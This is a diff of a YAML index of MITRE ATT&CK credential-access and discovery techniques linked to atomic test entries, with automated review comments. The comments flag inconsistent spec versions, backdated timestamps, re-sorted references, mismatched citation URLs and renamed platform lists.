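Review bot: T1003.003 only loses `spec_version: '2.1'` here and stays at `x_mitre_attack_spec_version: 3.1.0`, while the neighbouring objects in this same change (T1111, T1558.003, T1552.007, T1069) move to 3.2.0. Confirm this mirrors the upstream STIX object rather than a partial regeneration; if every technique is now sourced from one 3.2.0 bundle the version string should agree across the file.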
@@ -97691,7 +98415,7 @@ credential-access:
elevation_required: true
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -97723,6 +98447,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -97732,7 +98457,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -97744,43 +98468,44 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests:
- name: Request for service tickets
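Review bot: the external_references moves in this hunk are a re-sort by citation author (Bani, EmpireProject, Medin, Metcalf, Microsoft, Microsoft, Schroeder), not content edits; one sentence in the commit message saying the generator now sorts references would save reviewers from diffing each moved entry. The only real change is the Harmj0y entry, whose URL moves from www.harmj0y.net to blog.harmj0y.net with the retrieval date updated to September 23, 2024; updating URL and retrieval date together is the right pattern and should be applied consistently wherever that site is cited.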
@@ -97985,70 +98710,7 @@ credential-access:
name: powershell
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -98059,21 +98721,83 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests:
- name: DCSync (Active Directory)
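Review bot: the two Harmj0y references in this hunk now disagree: `Harmj0y Mimikatz and DCSync` was refreshed to blog.harmj0y.net (retrieved September 23, 2024) while `Harmj0y DCSync Sept 2015`, which cites the same post, still points at http://www.harmj0y.net/... (retrieved December 4, 2017). The visible detection text cites `Harmj0y DCSync Sept 2015`, so that key cannot simply be dropped; update both entries or neither so they do not resolve differently. Similarly `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` are the same adsecurity.org/?p=1729 article under two source names with different retrieval dates; if that is inherited from upstream leave it, but a comment would stop someone "fixing" it by deleting a citation key the text still uses.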
@@ -98153,7 +98877,7 @@ credential-access:
elevation_required: false
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -98166,6 +98890,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -98202,17 +98927,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
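Review bot: the platform list change (Azure AD, Google Workspace and Office 365 replaced by Office Suite and Identity Provider, version 2.4 -> 2.5) is a data-model change, not just metadata: any per-platform index derived from `x_mitre_platforms` will no longer list this technique under the old platform names, so those indexes need regenerating in the same change (the same swap appears for T1069 and T1069.003 below). The `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` keys are only moved up from the end of the object here, not changed.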
@@ -98258,81 +98983,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -98345,23 +98999,89 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -98399,7 +99119,7 @@ credential-access:
elevation_required: true
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -98456,9 +99176,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests:
- name: List All Secrets
@@ -98613,7 +99332,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -98637,8 +99356,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
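Review bot: in the Network Device Authentication entry both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed with no replacement, and the hunk just above moves its `modified` timestamp backwards from 2022-05-11 to 2021-12-14. Together these look like the object was pulled from an older or different source bundle than the rest of the file; confirm that the resulting object still carries an attack spec version (none is visible in the hunk) and that the date regression is intended. Note also that this entry keeps `x_mitre_permissions_required: - Administrator` while the other rewritten techniques in this change drop that field.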
@@ -98703,7 +99420,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests:
- name: System Owner/User Discovery
@@ -98837,7 +99553,7 @@ discovery:
'
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
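Review bot: `modified` for T1613 goes backwards here (2023-05-09 -> 2023-04-15), as it does for T1016.001 (2022-04-25 -> 2021-03-25) and T1615 (2023-05-09 -> 2023-01-06) further down. A regenerated file should not make objects older; if the earlier dates are what the upstream STIX bundle now reports that is acceptable, but the commit message should name the bundle version this was generated from so the regressions are explainable.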
@@ -98896,7 +99612,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests:
- name: Docker Container and Resource Discovery
@@ -98985,7 +99700,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -99006,8 +99721,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests:
- name: Check internet connection using ping Windows
@@ -99111,7 +99824,7 @@ discovery:
'
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -99134,15 +99847,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
